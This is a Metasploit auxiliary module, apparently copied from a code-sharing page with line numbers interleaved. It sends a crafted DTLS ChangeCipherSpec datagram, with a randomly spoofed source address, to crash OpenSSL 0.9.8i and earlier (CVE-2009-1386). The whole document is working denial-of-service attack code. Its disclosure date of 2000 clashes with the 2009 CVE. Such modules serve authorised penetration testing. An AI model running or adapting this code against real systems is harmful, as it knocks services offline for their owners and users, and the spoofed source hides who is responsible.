Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Auxiliary::Dos
8
  include Msf::Exploit::Capture
9

10
  def initialize(info = {})
11
    super(update_info(info,
12
      'Name'		=> 'OpenSSL DTLS ChangeCipherSpec Remote DoS',
13
      'Description'	=> %q{
14
          This module performs a Denial of Service Attack against Datagram TLS in OpenSSL
15
        version 0.9.8i and earlier. OpenSSL crashes under these versions when it receives a
16
        ChangeCipherspec Datagram before a ClientHello.
17
      },
18
      'Author'	=> [
19
            'Jon Oberheide <jon[at]oberheide.org>', #original code
20
            'theLightCosine' # metasploit module
21
            ],
22
      'License'        => MSF_LICENSE,
23
      'References'     =>
24
        [
25
          [ 'CVE', '2009-1386' ],
26
          [ 'OSVDB', '55073'],
27
        ],
28
      'DisclosureDate' => '2000-04-26'))
29

30
    register_options([
31
        Opt::RPORT(80),
32
        Opt::RHOST
33
      ]
34
    )
35

36
    deregister_options('FILTER','PCAPFILE', 'INTERFACE', 'SNAPLEN', 'TIMEOUT')
37
  end
38

39
  def run
40
    open_pcap
41
    print_status("Creating DTLS ChangeCipherSpec Datagram...")
42
    p = PacketFu::UDPPacket.new
43
    p.ip_daddr = datastore['RHOST']
44
    p.ip_src = rand(0x100000000)
45
    p.ip_ttl = 44
46
    p.udp_sport = 34060
47
    p.udp_dport = datastore['RPORT'].to_i
48
    p.payload = "\x14\xfe\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x01"
49
    p.recalc
50
    print_status("Sending Datagram to target...")
51
    capture_sendto(p, '255.255.255.255')
52
    close_pcap
53
  end
54
end
55

56